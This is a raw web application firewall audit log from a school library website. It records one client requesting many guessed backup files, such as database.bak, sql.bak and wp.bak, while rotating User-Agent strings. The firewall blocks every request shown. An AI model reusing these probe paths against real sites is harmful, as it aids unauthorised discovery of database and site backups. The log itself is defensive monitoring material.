Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854693149 2166 (- - -) Stopwatch2: 1747543854693149 2166; combined=780, p1=391, p2=359, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7262dd5c-Z-- --0fa19329-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxdBAAAAMY 103.236.140.4 53770 103.236.140.4 8181 --0fa19329-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:66.0.4) Gecko/20100101 Firefox/66.0.4 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933782 --0fa19329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0fa19329-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854702017 1718 (- - -) Stopwatch2: 1747543854702017 1718; combined=673, p1=325, p2=322, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fa19329-Z-- --dc00b86e-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdCAAAAMs 103.236.140.4 54025 103.236.140.4 8181 --dc00b86e-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123254648 --dc00b86e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dc00b86e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855089995 1698 (- - -) Stopwatch2: 1747543855089995 1698; combined=665, p1=338, p2=299, p3=0, p4=0, p5=28, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc00b86e-Z-- --c170da05-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7rQAAAAo 103.236.140.4 53738 103.236.140.4 8181 --c170da05-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 122757001 --c170da05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c170da05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855097544 2001 (- - -) Stopwatch2: 1747543855097544 2001; combined=728, p1=365, p2=323, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c170da05-Z-- --2058dc5f-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdFQAAAMM 103.236.140.4 54062 103.236.140.4 8181 --2058dc5f-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127580939 --2058dc5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2058dc5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855097220 3125 (- - -) Stopwatch2: 1747543855097220 3125; combined=624, p1=315, p2=284, p3=0, p4=0, p5=24, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2058dc5f-Z-- --0df77d08-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR3wAAAI8 103.236.140.4 54810 103.236.140.4 8181 --0df77d08-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70778910 --0df77d08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0df77d08-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855097594 5848 (- - -) Stopwatch2: 1747543855097594 5848; combined=738, p1=367, p2=342, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df77d08-Z-- --f8bdb918-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR5wAAAJg 103.236.140.4 55416 103.236.140.4 8181 --f8bdb918-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:62.0.3) Gecko/20100101 Firefox/62.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 83263503 --f8bdb918-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8bdb918-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855104178 2285 (- - -) Stopwatch2: 1747543855104178 2285; combined=1086, p1=715, p2=341, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8bdb918-Z-- --7798050c-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR4AAAAIU 103.236.140.4 54930 103.236.140.4 8181 --7798050c-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 122395070 --7798050c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7798050c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855101895 4918 (- - -) Stopwatch2: 1747543855101895 4918; combined=721, p1=332, p2=361, p3=0, p4=0, p5=27, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7798050c-Z-- --c8564a2d-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7sgAAAAo 103.236.140.4 53706 103.236.140.4 8181 --c8564a2d-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 86962048 --c8564a2d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c8564a2d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855099662 11465 (- - -) Stopwatch2: 1747543855099662 11465; combined=8815, p1=338, p2=8444, p3=0, p4=0, p5=32, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8564a2d-Z-- --eab2a90d-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdGAAAANI 103.236.140.4 53760 103.236.140.4 8181 --eab2a90d-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.9.0) Gecko/20100101 Firefox/52.9.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127616644 --eab2a90d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eab2a90d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855109459 2069 (- - -) Stopwatch2: 1747543855109459 2069; combined=739, p1=369, p2=333, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab2a90d-Z-- --25908c4c-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7ywAAAA8 103.236.140.4 55588 103.236.140.4 8181 --25908c4c-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151683078 --25908c4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25908c4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855111506 1857 (- - -) Stopwatch2: 1747543855111506 1857; combined=669, p1=327, p2=316, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25908c4c-Z-- --77b25a23-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR6gAAAJc 103.236.140.4 55576 103.236.140.4 8181 --77b25a23-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118849548 --77b25a23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --77b25a23-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855110952 3234 (- - -) Stopwatch2: 1747543855110952 3234; combined=1000, p1=377, p2=589, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b25a23-Z-- --a2c17678-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdGwAAAMA 103.236.140.4 54952 103.236.140.4 8181 --a2c17678-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.5.2) Gecko/20100101 Firefox/52.5.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118980620 --a2c17678-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a2c17678-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855098630 17113 (- - -) Stopwatch2: 1747543855098630 17113; combined=751, p1=365, p2=355, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2c17678-Z-- --eacd8910-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR7wAAAJE 103.236.140.4 54316 103.236.140.4 8181 --eacd8910-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150831113 --eacd8910-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eacd8910-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855114105 2147 (- - -) Stopwatch2: 1747543855114105 2147; combined=777, p1=398, p2=348, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eacd8910-Z-- --8b963e18-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o72gAAAAA 103.236.140.4 55624 103.236.140.4 8181 --8b963e18-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634505 --8b963e18-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8b963e18-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855115853 5527 (- - -) Stopwatch2: 1747543855115853 5527; combined=627, p1=300, p2=303, p3=0, p4=0, p5=24, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b963e18-Z-- --6d64d706-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdJgAAANM 103.236.140.4 54058 103.236.140.4 8181 --6d64d706-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150011910 --6d64d706-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d64d706-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855117550 4003 (- - -) Stopwatch2: 1747543855117550 4003; combined=698, p1=346, p2=323, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d64d706-Z-- --bec3820d-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR-wAAAJM 103.236.140.4 55514 103.236.140.4 8181 --bec3820d-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 75577343 --bec3820d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bec3820d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855121721 2152 (- - -) Stopwatch2: 1747543855121721 2152; combined=788, p1=373, p2=383, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
